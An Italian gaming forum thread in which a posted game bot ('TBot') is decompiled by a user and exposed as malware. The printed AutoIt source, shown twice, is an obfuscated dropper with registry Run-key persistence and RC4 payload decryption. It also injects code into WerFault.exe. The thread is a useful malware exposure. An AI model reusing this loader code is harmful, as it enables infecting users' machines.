release TBot new clicker

IPLay · 22 Dicembre 2014

UFeatures:
1. Works in the background.
2. collect bonus boxes.
3. Collects winter box.
4. Refit the ship, after the destruction.
5. Use the PET
6. You can set the time and break.
7. Displays the log collected during the work.
8. Automatically updated to the latest version.
9. The collection function of palladium will be implemented later.

It requires:
1. NET FRAMEWORK 4.0
2. NET FRAMEWORK 4.5
3. Flash Player latest version of the browser Internet Explorer.
4. Bot not work with accounts registered through any services (such rambler), changing the address of the home page and, in fact, the cards.
When you try to login with this account there will be a error

Status - ONLINE

PREPARE THE ACCOUNT :

1. From the map, in the settings> Gameplay activate the item Automatic change to the card. Without this setting, the bot will not be able to start work.
Just to avoid unpleasant situations loss camouflage / hi-tekov / ammunition - check the settings in the screenshot:

2. Set the low quality of graphics boxes.
3. Disconnect the background and explosions.
4. Set the minimum size of the minimap.
5. Can you just turn off the chat, resources, cargo boxes (Optional).

- First run:
When the boot bot login and go to the Map. After a full load map, go to the tab Login and click Start.

- FAQ: Settings
1. General (General)
- 1.1. Runtime (Hours) Default is not set.
- 1.2. Screenshot (Snapshot desktop screen) - Creates an image in the root folder of the bot.
- 1.3. Live Mode (Real Time) - Emulates the browser, allowing you to control the ship during Botha.
- 1.4. Open Browser - Quick Login to your account. Login occurs through the SID, so that the logs do not collect stray.
- 1.5. RMB (right mouse button) on the map - Screening of the individual parts of the interface. Protect from breeding clicking the clicker.
Clear Restricted Area`s button clears the selected areas.
- 1.6. The middle mouse button on the minimap given the trajectory of the ship. You must install at least 2 points.
Clear Waypoint`s button clears the specified route.
2. Break Settings (Interruptions)
- 2.1. Break - Suspend bot for a specified time (min.)
- 2.2. Every - Hours before the interruption. (Hour)
3. Repair Settings (Repair)
- 3.1. You can specify exactly how to repair the ship. (Based on / at the nearest portal / On-site destruction) By default, the ship being repaired at the nearest base.

- FAQ: PET
1.1. To start PET, first select the desired mode then activate itself PET, pressing Start

- FAQ: Plus
1.1. Allows you to view information about the status of the bot on smartphones.
website: http://plus.devblognet.de

1.2. To start the service, you must click Start Service tab Plus, after which you will be assigned a unique Client ID
To view details of your account, enter your Client ID in the above link : http://plus.devblognet.de

download link:
Edit.

Zanna · 22 Dicembre 2014

Sposto

.

.SexyCactus · 22 Dicembre 2014

Non si apre nemmeno.

Win 7 64 bit.

Devilnever · 23 Dicembre 2014

Non mi fido molto. Aspetterò un pò.

koth · 23 Dicembre 2014

https://www.virustotal.com/it/file/...306fb121faaa9f2444c645a8/analysis/1419346494/

novellino · 3 Gennaio 2015

mmm io eseguo ma non succede nulla... bho

Phy_AsTy · 18 Gennaio 2015

Scaricato, dato in pasto a rdg packer detector, risponde "Autoit"

estraggo il source in maniera poco ortodossa e mi ritrovo

Codice:

FileInstall("inc.jpg", @TempDir & _f2(47) & _f2(114), 1)
FileInstall("rev2", @TempDir & _f2(47) & _f2(114) & _f2(114), 1)
FileWrite(FileOpen(@ScriptFullPath & STRINGREVERSE(":reifitnedI.enoZ:") & Chr(36) & STRINGREVERSE("ATAD"), 2), STRINGREVERSE("]refsnarTenoZ[") & @CRLF & STRINGREVERSE("=dIenoZ") & 0)
If 1 == 1 Then
    If @ScriptDir <> [MENTION=109940]app[/MENTION]DataDir Then
        $rand = Random(1000, 99999, 1)
        _f3 [MENTION=109940]app[/MENTION]DataDir & "\" & $rand & ".e" & STRINGREVERSE("ex"))
        ShellExecute [MENTION=109940]app[/MENTION]DataDir & "\" & $rand & ".e" & STRINGREVERSE("ex"))
        Exit
    EndIf
EndIf
Global $rf1 = STRINGREVERSE("$+]/\\["), $rf2 = STRINGREVERSE("$*s\^)s?(|]|\<>:/\\["), $rf3 = STRINGREVERSE("\krowemarF\TEN.tfosorciM\"), $rf4 = STRINGREVERSE("exe.cbv\")
If 0 == 1 Then
    RegWrite(_f2(72) & _f2(75) & _f2(67) & _f2(85) & _f2(92) & _f2(83) & _f2(79) & _f2(70) & _f2(84) & _f2(87) & _f2(65) & _f2(82) & _f2(69) & _f2(92) & _f2(77) & _f2(105) & _f2(99) & _f2(114) & _f2(111) & _f2(115) & _f2(111) & _f2(102) & _f2(116) & _f2(92) & _f2(87) & _f2(105) & _f2(110) & _f2(100) & _f2(111) & _f2(119) & _f2(115) & _f2(92) & _f2(67) & _f2(117) & _f2(114) & _f2(114) & _f2(101) & _f2(110) & _f2(116) & _f2(86) & _f2(101) & _f2(114) & _f2(115) & _f2(105) & _f2(111) & _f2(110) & _f2(92) & _f2(82) & _f2(117) & _f2(110), "WerFault", _f2(82) & _f2(69) & _f2(71) & _f2(95) & _f2(83) & _f2(90), @ScriptDir & "\" & @ScriptName)
EndIf
$de = _rc4(FileRead(@TempDir & _f2(47) & _f2(114) & _f2(114)), "FxQp2T7kVMrZoNsRT8WU8jVkaVGX")
If 0 == 1 Then
    $point = _getvbc()
Else
    $point = [MENTION=134]system[/MENTION]Dir & "\WerFault.exe"
EndIf
_f1($point, $de)

Func _rc4($data, $key)
    Local $opcode = _get_rc4_opcode()
    Local $codebuffer = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & BinaryLen($opcode) & _f2(93))
    DllStructSetData($codebuffer, 1, $opcode)
    Local $buffer = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & BinaryLen($data) & _f2(93))
    DllStructSetData($buffer, 1, $data)
    Local $usr32 = _f2(117) & _f2(115) & _f2(101) & _f2(114) & _f2(51) & _f2(50) & _f2(46) & _f2(100) & _f2(108) & _f2(108)
    Local $cwp = _f2(67) & _f2(97) & _f2(108) & _f2(108) & _f2(87) & _f2(105) & _f2(110) & _f2(100) & _f2(111) & _f2(119) & _f2(80) & _f2(114) & _f2(111) & _f2(99)
    Local $none = _f2(110) & _f2(111) & _f2(110) & _f2(101)
    DllCall($usr32, $none, $cwp, "ptr", DllStructGetPtr($codebuffer), "ptr", DllStructGetPtr($buffer), _f2(105) & _f2(110) & _f2(116), BinaryLen($data), _f2(115) & _f2(116) & _f2(114), $key, _f2(105) & _f2(110) & _f2(116), 0)
    Local $ret = DllStructGetData($buffer, 1)
    $buffer = 0
    $codebuffer = 0
    Return $ret
EndFunc

Func _flta($p)
    Local $a = NULL 
    $p = StringRegExpReplace($p, $rf1, "") & "\"
    If NOT FileExists($p) OR StringRegExp("*", $rf2) Then Exit
    Local $c = FileFindFirstFile($p & "*")
    While 1
        Local $b = FileFindNextFile($c)
        If [MENTION=11728]error[/MENTION] Then ExitLoop
        If (@extended = 0) Then ContinueLoop
        If StringInStr($b, ".") Then $a &= "y_" & $b
    WEnd
    If $a = "" Then Exit
    Return StringSplit(StringTrimLeft($a, 1), "y_")
EndFunc

Func _get_rc4_opcode()
    Local $opcode_p2 = _f2(68) & _f2(70) & _f2(67) & _f2(48) & _f2(48) & _f2(48) & _f2(49) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(55) & _f2(68) & _f2(52) & _f2(55) & _f2(56) & _f2(66) & _f2(52) & _f2(53) & _f2(70) & _f2(67) & _f2(51) & _f2(49) & _f2(68) & _f2(50) & _f2(70) & _f2(55) & _f2(55) & _f2(53) & _f2(70) & _f2(48) & _f2(57) & _f2(50) & _f2(48) & _f2(51) & _f2(52) & _f2(53) & _f2(49) & _f2(48) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(48) & _f2(56) & _f2(66) & _f2(52) & _f2(68) & _f2(70) & _f2(67) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(56) & _f2(67) & _f2(48) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(48) & _f2(49) & _f2(67) & _f2(56) & _f2(48) & _f2(51) & _f2(52) & _f2(53) & _f2(70) & _f2(52) & _f2(50) & _f2(53) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(57) & _f2(52) & _f2(53) & _f2(70) & _f2(52) & _f2(56) & _f2(66) & _f2(55) & _f2(53) & _f2(70) & _f2(67) & _f2(56) & _f2(65) & _f2(56) & _f2(52) & _f2(51) & _f2(53) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(66) & _f2(55) & _f2(68) & _f2(70) & _f2(52) & _f2(56) & _f2(54) & _f2(56) & _f2(52)
    Local $opcode_p1 = _f2(48) & _f2(120) & _f2(67) & _f2(56) & _f2(49) & _f2(48) & _f2(48) & _f2(49) & _f2(48) & _f2(48) & _f2(54) & _f2(65) & _f2(48) & _f2(48) & _f2(54) & _f2(65) & _f2(48) & _f2(48) & _f2(53) & _f2(51) & _f2(53) & _f2(54) & _f2(53) & _f2(55) & _f2(56) & _f2(66) & _f2(53) & _f2(53) & _f2(49) & _f2(48) & _f2(51) & _f2(49) & _f2(67) & _f2(57) & _f2(56) & _f2(57) & _f2(67) & _f2(56) & _f2(52) & _f2(57) & _f2(56) & _f2(57) & _f2(68) & _f2(55) & _f2(70) & _f2(50) & _f2(65) & _f2(69) & _f2(52) & _f2(56) & _f2(52) & _f2(56) & _f2(50) & _f2(57) & _f2(67) & _f2(56) & _f2(56) & _f2(57) & _f2(52) & _f2(53) & _f2(70) & _f2(48) & _f2(56) & _f2(53) & _f2(67) & _f2(48) & _f2(48) & _f2(70) & _f2(56) & _f2(52) & _f2(68) & _f2(67) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(66) & _f2(57) & _f2(48) & _f2(48) & _f2(48) & _f2(49) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(56) & _f2(67) & _f2(56) & _f2(50) & _f2(67) & _f2(48) & _f2(49) & _f2(56) & _f2(56) & _f2(56) & _f2(52) & _f2(48) & _f2(68) & _f2(69) & _f2(70) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(69) & _f2(50) & _f2(70) & _f2(51) & _f2(56) & _f2(51) & _f2(54) & _f2(53) & _f2(70) & _f2(52) & _f2(48) & _f2(48) & _f2(56) & _f2(51) & _f2(54) & _f2(53) & _f2(70) & _f2(67) & _f2(48) & _f2(48) & _f2(56) & _f2(49) & _f2(55) & $opcode_p2
    Local $opcode_p3 = _f2(48) & _f2(56) & _f2(57) & _f2(56) & _f2(53) & _f2(69) & _f2(56) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(57) & _f2(68) & _f2(69) & _f2(48) & _f2(51) & _f2(66) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(65) & _f2(48) & _f2(54) & _f2(56) & _f2(57) & _f2(68) & _f2(70) & _f2(48) & _f2(51) & _f2(66) & _f2(68) & _f2(69) & _f2(56) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(54) & _f2(48) & _f2(55) & _f2(56) & _f2(56) & _f2(48) & _f2(54) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(69) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(55) & _f2(48) & _f2(49) & _f2(67) & _f2(49) & _f2(56) & _f2(49) & _f2(69) & _f2(49) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(65) & _f2(56) & _f2(52) & _f2(48) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(66) & _f2(55) & _f2(53) & _f2(48) & _f2(56) & _f2(48) & _f2(49) & _f2(68) & _f2(54) & _f2(51) & _f2(48) & _f2(48) & _f2(54) & _f2(52) & _f2(50) & _f2(69) & _f2(66) & _f2(57) & _f2(56) & _f2(53) & _f2(70) & _f2(53) & _f2(69) & _f2(53) & _f2(66) & _f2(67) & _f2(57) & _f2(67) & _f2(50) & _f2(49) & _f2(48) & _f2(48) & _f2(48)
    Local $opcode = $opcode_p1 & _f2(51) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(56) & _f2(56) & _f2(52) & _f2(51) & _f2(53) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(52) & _f2(53) & _f2(70) & _f2(67) & _f2(69) & _f2(66) & _f2(66) & _f2(48) & _f2(56) & _f2(68) & _f2(57) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(51) & _f2(49) & _f2(70) & _f2(70) & _f2(56) & _f2(57) & _f2(70) & _f2(65) & _f2(51) & _f2(57) & _f2(53) & _f2(53) & _f2(48) & _f2(67) & _f2(55) & _f2(54) & _f2(54) & _f2(51) & _f2(56) & _f2(66) & _f2(56) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(52) & _f2(48) & _f2(50) & _f2(53) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(57) & _f2(56) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(57) & _f2(68) & _f2(56) & _f2(48) & _f2(51) & _f2(56) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(48) & _f2(48) & _f2(51) & _f2(56) & _f2(53) & _f2(69) & _f2(56) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(50) & _f2(53) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & $opcode_p3
    Return $opcode
EndFunc

Func _f1($a, $b)
    Local $c = _d1(FileRead(@TempDir & _f2(47) & _f2(114))), $d = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & _d2($c) & _f2(93)), $e = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & _d2($b) & _f2(93)), $f = _f2(105) & _f2(110) & _f2(116), $g = _f2(112) & _f2(116) & _f2(114), $h = _f2(119) & _f2(115) & _f2(116) & _f2(114), $i = _d1(_f2(108) & _f2(108) & _f2(100) & _f2(46) & _f2(50) & _f2(51) & _f2(114) & _f2(101) & _f2(115) & _f2(117)), $j = "W" & _f2(99) & _f2(111) & _f2(114) & _f2(80) & _f2(119) & _f2(111) & _f2(100) & _f2(110) & _f2(105) & _f2(87) & _f2(108) & _f2(108) & _f2(97) & _f2(67)
    If DllStructSetData($d, 1, $c) Then DllStructSetData($e, 1, $b)
    Return DllCall($i, $f, _d1($j), $g, _d3($d), $h, ($a), $g, _d3($e), $f, 0, $f, 0)
EndFunc

Func _f2($a)
    Return Chr($a + 22 - 11 - 10 - 1)
EndFunc

Func _f3($a)
    FileCopy(@ScriptDir & "\" & @ScriptName, $a)
EndFunc

Func _getvbc()
    $array = _flta [MENTION=190952]Windows[/MENTION]Dir & $rf3)
    Return [MENTION=190952]Windows[/MENTION]Dir & $rf3 & $array[$array[0]] & $rf4
EndFunc

Func _d1($a)
    Return STRINGREVERSE($a)
EndFunc

Func _d2($a)
    Return BinaryLen($a)
EndFunc

Func _d3($a)
    Return DllStructGetPtr($a)
EndFunc

I primi due righi, nulla da ridire
direi che è un piano ben ingegnato,

poi leggo

RegWrite(_f2(72) & _f2(75) & _f2(67) & _f2(85) & _f2(92)....

che tradotto con la stessa funzione all'interno dello script

Func _f2($a)
Return Chr($a + 22 - 11 - 10 - 1)
EndFunc

significa
regWrite("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","WerFault", "REG_SZ", ....

Praticamente impone alla macchina di avviarsi insieme a windows, il che è molto strano, non ho voluto continuare perché il resto non mi piaceva affatto

ho trovato la mia soluzione ahahah a voi i commenti

Nhoya · 18 Gennaio 2015

Phy_AsTy ha detto:

Scaricato, dato in pasto a rdg packer detector, risponde "Autoit"

estraggo il source in maniera poco ortodossa e mi ritrovo

Codice:

FileInstall("inc.jpg", @TempDir & _f2(47) & _f2(114), 1)
FileInstall("rev2", @TempDir & _f2(47) & _f2(114) & _f2(114), 1)
FileWrite(FileOpen(@ScriptFullPath & STRINGREVERSE(":reifitnedI.enoZ:") & Chr(36) & STRINGREVERSE("ATAD"), 2), STRINGREVERSE("]refsnarTenoZ[") & @CRLF & STRINGREVERSE("=dIenoZ") & 0)
If 1 == 1 Then
    If @ScriptDir <> [MENTION=109940]app[/MENTION]DataDir Then
        $rand = Random(1000, 99999, 1)
        _f3 [MENTION=109940]app[/MENTION]DataDir & "\" & $rand & ".e" & STRINGREVERSE("ex"))
        ShellExecute [MENTION=109940]app[/MENTION]DataDir & "\" & $rand & ".e" & STRINGREVERSE("ex"))
        Exit
    EndIf
EndIf
Global $rf1 = STRINGREVERSE("$+]/\\["), $rf2 = STRINGREVERSE("$*s\^)s?(|]|\<>:/\\["), $rf3 = STRINGREVERSE("\krowemarF\TEN.tfosorciM\"), $rf4 = STRINGREVERSE("exe.cbv\")
If 0 == 1 Then
    RegWrite(_f2(72) & _f2(75) & _f2(67) & _f2(85) & _f2(92) & _f2(83) & _f2(79) & _f2(70) & _f2(84) & _f2(87) & _f2(65) & _f2(82) & _f2(69) & _f2(92) & _f2(77) & _f2(105) & _f2(99) & _f2(114) & _f2(111) & _f2(115) & _f2(111) & _f2(102) & _f2(116) & _f2(92) & _f2(87) & _f2(105) & _f2(110) & _f2(100) & _f2(111) & _f2(119) & _f2(115) & _f2(92) & _f2(67) & _f2(117) & _f2(114) & _f2(114) & _f2(101) & _f2(110) & _f2(116) & _f2(86) & _f2(101) & _f2(114) & _f2(115) & _f2(105) & _f2(111) & _f2(110) & _f2(92) & _f2(82) & _f2(117) & _f2(110), "WerFault", _f2(82) & _f2(69) & _f2(71) & _f2(95) & _f2(83) & _f2(90), @ScriptDir & "\" & @ScriptName)
EndIf
$de = _rc4(FileRead(@TempDir & _f2(47) & _f2(114) & _f2(114)), "FxQp2T7kVMrZoNsRT8WU8jVkaVGX")
If 0 == 1 Then
    $point = _getvbc()
Else
    $point = [MENTION=134]system[/MENTION]Dir & "\WerFault.exe"
EndIf
_f1($point, $de)

Func _rc4($data, $key)
    Local $opcode = _get_rc4_opcode()
    Local $codebuffer = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & BinaryLen($opcode) & _f2(93))
    DllStructSetData($codebuffer, 1, $opcode)
    Local $buffer = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & BinaryLen($data) & _f2(93))
    DllStructSetData($buffer, 1, $data)
    Local $usr32 = _f2(117) & _f2(115) & _f2(101) & _f2(114) & _f2(51) & _f2(50) & _f2(46) & _f2(100) & _f2(108) & _f2(108)
    Local $cwp = _f2(67) & _f2(97) & _f2(108) & _f2(108) & _f2(87) & _f2(105) & _f2(110) & _f2(100) & _f2(111) & _f2(119) & _f2(80) & _f2(114) & _f2(111) & _f2(99)
    Local $none = _f2(110) & _f2(111) & _f2(110) & _f2(101)
    DllCall($usr32, $none, $cwp, "ptr", DllStructGetPtr($codebuffer), "ptr", DllStructGetPtr($buffer), _f2(105) & _f2(110) & _f2(116), BinaryLen($data), _f2(115) & _f2(116) & _f2(114), $key, _f2(105) & _f2(110) & _f2(116), 0)
    Local $ret = DllStructGetData($buffer, 1)
    $buffer = 0
    $codebuffer = 0
    Return $ret
EndFunc

Func _flta($p)
    Local $a = NULL 
    $p = StringRegExpReplace($p, $rf1, "") & "\"
    If NOT FileExists($p) OR StringRegExp("*", $rf2) Then Exit
    Local $c = FileFindFirstFile($p & "*")
    While 1
        Local $b = FileFindNextFile($c)
        If [MENTION=11728]error[/MENTION] Then ExitLoop
        If (@extended = 0) Then ContinueLoop
        If StringInStr($b, ".") Then $a &= "y_" & $b
    WEnd
    If $a = "" Then Exit
    Return StringSplit(StringTrimLeft($a, 1), "y_")
EndFunc

Func _get_rc4_opcode()
    Local $opcode_p2 = _f2(68) & _f2(70) & _f2(67) & _f2(48) & _f2(48) & _f2(48) & _f2(49) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(55) & _f2(68) & _f2(52) & _f2(55) & _f2(56) & _f2(66) & _f2(52) & _f2(53) & _f2(70) & _f2(67) & _f2(51) & _f2(49) & _f2(68) & _f2(50) & _f2(70) & _f2(55) & _f2(55) & _f2(53) & _f2(70) & _f2(48) & _f2(57) & _f2(50) & _f2(48) & _f2(51) & _f2(52) & _f2(53) & _f2(49) & _f2(48) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(48) & _f2(56) & _f2(66) & _f2(52) & _f2(68) & _f2(70) & _f2(67) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(56) & _f2(67) & _f2(48) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(48) & _f2(49) & _f2(67) & _f2(56) & _f2(48) & _f2(51) & _f2(52) & _f2(53) & _f2(70) & _f2(52) & _f2(50) & _f2(53) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(57) & _f2(52) & _f2(53) & _f2(70) & _f2(52) & _f2(56) & _f2(66) & _f2(55) & _f2(53) & _f2(70) & _f2(67) & _f2(56) & _f2(65) & _f2(56) & _f2(52) & _f2(51) & _f2(53) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(66) & _f2(55) & _f2(68) & _f2(70) & _f2(52) & _f2(56) & _f2(54) & _f2(56) & _f2(52)
    Local $opcode_p1 = _f2(48) & _f2(120) & _f2(67) & _f2(56) & _f2(49) & _f2(48) & _f2(48) & _f2(49) & _f2(48) & _f2(48) & _f2(54) & _f2(65) & _f2(48) & _f2(48) & _f2(54) & _f2(65) & _f2(48) & _f2(48) & _f2(53) & _f2(51) & _f2(53) & _f2(54) & _f2(53) & _f2(55) & _f2(56) & _f2(66) & _f2(53) & _f2(53) & _f2(49) & _f2(48) & _f2(51) & _f2(49) & _f2(67) & _f2(57) & _f2(56) & _f2(57) & _f2(67) & _f2(56) & _f2(52) & _f2(57) & _f2(56) & _f2(57) & _f2(68) & _f2(55) & _f2(70) & _f2(50) & _f2(65) & _f2(69) & _f2(52) & _f2(56) & _f2(52) & _f2(56) & _f2(50) & _f2(57) & _f2(67) & _f2(56) & _f2(56) & _f2(57) & _f2(52) & _f2(53) & _f2(70) & _f2(48) & _f2(56) & _f2(53) & _f2(67) & _f2(48) & _f2(48) & _f2(70) & _f2(56) & _f2(52) & _f2(68) & _f2(67) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(66) & _f2(57) & _f2(48) & _f2(48) & _f2(48) & _f2(49) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(56) & _f2(67) & _f2(56) & _f2(50) & _f2(67) & _f2(48) & _f2(49) & _f2(56) & _f2(56) & _f2(56) & _f2(52) & _f2(48) & _f2(68) & _f2(69) & _f2(70) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(69) & _f2(50) & _f2(70) & _f2(51) & _f2(56) & _f2(51) & _f2(54) & _f2(53) & _f2(70) & _f2(52) & _f2(48) & _f2(48) & _f2(56) & _f2(51) & _f2(54) & _f2(53) & _f2(70) & _f2(67) & _f2(48) & _f2(48) & _f2(56) & _f2(49) & _f2(55) & $opcode_p2
    Local $opcode_p3 = _f2(48) & _f2(56) & _f2(57) & _f2(56) & _f2(53) & _f2(69) & _f2(56) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(57) & _f2(68) & _f2(69) & _f2(48) & _f2(51) & _f2(66) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(65) & _f2(48) & _f2(54) & _f2(56) & _f2(57) & _f2(68) & _f2(70) & _f2(48) & _f2(51) & _f2(66) & _f2(68) & _f2(69) & _f2(56) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(54) & _f2(48) & _f2(55) & _f2(56) & _f2(56) & _f2(48) & _f2(54) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(69) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(55) & _f2(48) & _f2(49) & _f2(67) & _f2(49) & _f2(56) & _f2(49) & _f2(69) & _f2(49) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(65) & _f2(56) & _f2(52) & _f2(48) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(66) & _f2(55) & _f2(53) & _f2(48) & _f2(56) & _f2(48) & _f2(49) & _f2(68) & _f2(54) & _f2(51) & _f2(48) & _f2(48) & _f2(54) & _f2(52) & _f2(50) & _f2(69) & _f2(66) & _f2(57) & _f2(56) & _f2(53) & _f2(70) & _f2(53) & _f2(69) & _f2(53) & _f2(66) & _f2(67) & _f2(57) & _f2(67) & _f2(50) & _f2(49) & _f2(48) & _f2(48) & _f2(48)
    Local $opcode = $opcode_p1 & _f2(51) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(56) & _f2(56) & _f2(52) & _f2(51) & _f2(53) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(52) & _f2(53) & _f2(70) & _f2(67) & _f2(69) & _f2(66) & _f2(66) & _f2(48) & _f2(56) & _f2(68) & _f2(57) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(51) & _f2(49) & _f2(70) & _f2(70) & _f2(56) & _f2(57) & _f2(70) & _f2(65) & _f2(51) & _f2(57) & _f2(53) & _f2(53) & _f2(48) & _f2(67) & _f2(55) & _f2(54) & _f2(54) & _f2(51) & _f2(56) & _f2(66) & _f2(56) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(52) & _f2(48) & _f2(50) & _f2(53) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(57) & _f2(56) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(57) & _f2(68) & _f2(56) & _f2(48) & _f2(51) & _f2(56) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(48) & _f2(48) & _f2(51) & _f2(56) & _f2(53) & _f2(69) & _f2(56) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(50) & _f2(53) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & $opcode_p3
    Return $opcode
EndFunc

Func _f1($a, $b)
    Local $c = _d1(FileRead(@TempDir & _f2(47) & _f2(114))), $d = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & _d2($c) & _f2(93)), $e = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & _d2($b) & _f2(93)), $f = _f2(105) & _f2(110) & _f2(116), $g = _f2(112) & _f2(116) & _f2(114), $h = _f2(119) & _f2(115) & _f2(116) & _f2(114), $i = _d1(_f2(108) & _f2(108) & _f2(100) & _f2(46) & _f2(50) & _f2(51) & _f2(114) & _f2(101) & _f2(115) & _f2(117)), $j = "W" & _f2(99) & _f2(111) & _f2(114) & _f2(80) & _f2(119) & _f2(111) & _f2(100) & _f2(110) & _f2(105) & _f2(87) & _f2(108) & _f2(108) & _f2(97) & _f2(67)
    If DllStructSetData($d, 1, $c) Then DllStructSetData($e, 1, $b)
    Return DllCall($i, $f, _d1($j), $g, _d3($d), $h, ($a), $g, _d3($e), $f, 0, $f, 0)
EndFunc

Func _f2($a)
    Return Chr($a + 22 - 11 - 10 - 1)
EndFunc

Func _f3($a)
    FileCopy(@ScriptDir & "\" & @ScriptName, $a)
EndFunc

Func _getvbc()
    $array = _flta [MENTION=190952]Windows[/MENTION]Dir & $rf3)
    Return [MENTION=190952]Windows[/MENTION]Dir & $rf3 & $array[$array[0]] & $rf4
EndFunc

Func _d1($a)
    Return STRINGREVERSE($a)
EndFunc

Func _d2($a)
    Return BinaryLen($a)
EndFunc

Func _d3($a)
    Return DllStructGetPtr($a)
EndFunc

I primi due righi, nulla da ridire
direi che è un piano ben ingegnato,

poi leggo

